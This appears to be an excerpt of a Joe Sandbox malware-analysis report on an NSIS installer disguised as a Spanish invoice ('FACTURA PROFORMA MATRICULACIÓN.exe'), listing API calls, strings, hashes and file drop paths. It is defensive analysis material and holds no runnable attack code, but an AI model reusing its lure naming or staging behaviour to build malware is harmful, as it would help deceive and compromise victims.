                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                                  • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                                    • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,Baboodom111 Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                  • wsprintfW.USER32 ref: 0040399B
                                                  • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039CE
                                                  • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A08
                                                    • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,0042C800,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A1E
                                                    • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                    • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                    • Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(77943420,00425F58,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00405F61,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                    • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                                  • ExitProcess.KERNEL32 ref: 00403A89
                                                  • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                                  • ExitProcess.KERNEL32 ref: 00403B33
                                                    • Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                  • String ID: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"$1033$Baboodom111 Setup$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                  • API String ID: 1813718867-701627914

                                                  Control-flow Graph

                                                  • Entry block 405705-405720 (graph not reproduced)
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405763
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                                  • GetClientRect.USER32(?,?), ref: 004057AF
                                                  • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                                  • ShowWindow.USER32(?,00000008), ref: 00405852
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                                    • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,?,00404320), ref: 00404503
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                                  • CloseHandle.KERNELBASE(00000000), ref: 004058DA
                                                  • ShowWindow.USER32(00000000), ref: 004058FE
                                                  • ShowWindow.USER32(00010436,00000008), ref: 00405903
                                                  • ShowWindow.USER32(00000008), ref: 0040594D
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                                  • CreatePopupMenu.USER32 ref: 00405992
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                                  • GetWindowRect.USER32(?,?), ref: 004059C6
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                                  • OpenClipboard.USER32(00000000), ref: 00405A27
                                                  • EmptyClipboard.USER32 ref: 00405A2D
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                                  • CloseClipboard.USER32 ref: 00405A88
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  APIs
                                                    • Part of subcall function 707E12BB: GlobalAlloc.KERNELBASE(00000040,?,707E12DB,?,707E137F,00000019,707E11CA,-000000A0), ref: 707E12C5
                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 707E1D2D
                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 707E1D75
                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 707E1D7F
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E1D92
                                                  • GlobalFree.KERNEL32(?), ref: 707E1E74
                                                  • GlobalFree.KERNEL32(?), ref: 707E1E79
                                                  • GlobalFree.KERNEL32(?), ref: 707E1E7E
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E2068
                                                  • lstrcpyW.KERNEL32(?,?), ref: 707E2222
                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 707E22A1
                                                  • LoadLibraryW.KERNEL32(00000008), ref: 707E22B2
                                                  • GetProcAddress.KERNEL32(?,?), ref: 707E230C
                                                  • lstrlenW.KERNEL32(00000808), ref: 707E2326
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  • Associated: 00000000.00000002.84226292605.00000000707E0000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000000.00000002.84226422708.00000000707E4000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000000.00000002.84226496862.00000000707E6000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID:
                                                  • API String ID: 245916457-0

                                                  Control-flow Graph

                                                  • Entry block 405c4d-405c73 (graph not reproduced)
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405C76
                                                  • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405CBE
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405CE1
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405CE7
                                                  • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405CF7
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                                  • FindClose.KERNEL32(00000000), ref: 00405DA6
                                                  Strings
                                                  • "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe", xrefs: 00405C56
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5A
                                                  • \*.*, xrefs: 00405CB8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-1509977935
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(77943420,00425F58,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00405F61,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                  • FindClose.KERNEL32(00000000), ref: 004068B5
                                                  Strings
                                                  • X_B, xrefs: 0040689F
                                                  • C:\Users\user\AppData\Local\Temp\nskBC9B.tmp, xrefs: 0040689E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp$X_B
                                                  • API String ID: 2295610775-4051690426
                                                  APIs
                                                  • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet, xrefs: 0040228E
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet
                                                  • API String ID: 542301482-719092821
                                                  • Opcode ID: f85662b23458363dd6ab5ae1447e3296406ee4d16919afc4b05b52c53faf9e24
                                                  • Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
                                                  • Opcode Fuzzy Hash: f85662b23458363dd6ab5ae1447e3296406ee4d16919afc4b05b52c53faf9e24
                                                  • Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: 1c1008cabeb65706c4d80cd9f40d1efee8b09dc724503127a4cfafcc83429b1a
                                                  • Instruction ID: cc057469d20fee5af05168c8280afa7b014ceb16d0f4b1b408cb009327ac905f
                                                  • Opcode Fuzzy Hash: 1c1008cabeb65706c4d80cd9f40d1efee8b09dc724503127a4cfafcc83429b1a
                                                  • Instruction Fuzzy Hash: 7BE04876908610DFE754EBA4AE495EE73B4EF80365B10097FE001F11D1D7B94D00975D
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 79cd65a6ba4c4f8614d2d44d2a0d076d8c5b6b6456474cad0f31bdfcd7c7fe30
                                                  • Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
                                                  • Opcode Fuzzy Hash: 79cd65a6ba4c4f8614d2d44d2a0d076d8c5b6b6456474cad0f31bdfcd7c7fe30
                                                  • Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29

                                                  Control-flow Graph (first block 403fc1-403fd3; legend: Executed / Not Executed)
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                                  • ShowWindow.USER32(?), ref: 0040401D
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                                  • ShowWindow.USER32(?,?), ref: 00404048
                                                  • DestroyWindow.USER32 ref: 0040405C
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                                  • GetDlgItem.USER32(?,?), ref: 00404094
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                                  • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                                  • GetDlgItem.USER32(?,?), ref: 0040415A
                                                  • GetDlgItem.USER32(?,00000002), ref: 00404164
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 004041CF
                                                  • GetDlgItem.USER32(?,00000003), ref: 00404275
                                                  • ShowWindow.USER32(00000000,?), ref: 00404296
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
                                                  • EnableWindow.USER32(?,?), ref: 004042C3
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 004042D9
                                                  • EnableMenuItem.USER32(00000000), ref: 004042E0
                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 004042F8
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                                  • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                                  • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                                  • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID:
                                                  • API String ID: 121052019-0
                                                  • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                  • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                                  • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                  • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E

                                                  Control-flow Graph (first block 403c13-403c2b; legend: Executed / Not Executed)
                                                  APIs
                                                    • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                    • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                  • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,77943420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe",00008001), ref: 00403C94
                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,77943420), ref: 00403D14
                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403D32
                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet), ref: 00403D7B
                                                    • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                  • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                                  • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                                  • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                                  • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-2772958463
                                                  • Opcode ID: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
                                                  • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                                  • Opcode Fuzzy Hash: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
                                                  • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D

                                                  Control-flow Graph (first block 4030a2-4030f0; legend: Executed / Not Executed)
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004030B3
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,00000400), ref: 004030CF
                                                    • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,80000000,00000003), ref: 00406035
                                                    • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406057
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,80000000,00000003), ref: 0040311B
                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-260537731

                                                  Control-flow Graph
                                                  • First basic block: 40657e-406587
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004066A0
                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
                                                  • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406714
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4024019347-266345325

                                                  Control-flow Graph
                                                  • First basic block: 401794-4017b9
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet,?,?,00000031), ref: 004017D5
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet,?,?,00000031), ref: 004017FA
                                                    • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,Baboodom111 Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                    • Part of subcall function 004055C6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                    • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                    • Part of subcall function 004055C6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00403412,00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405621
                                                    • Part of subcall function 004055C6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll), ref: 00405633
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                    • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet$C:\Users\user\AppData\Local\Temp\nskBC9B.tmp$C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll$Call
                                                  • API String ID: 1941528284-1382444632

                                                  Control-flow Graph
                                                  • First basic block: 4055c6-4055db
                                                  APIs
                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                  • lstrlenW.KERNEL32(00403412,Skipped: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
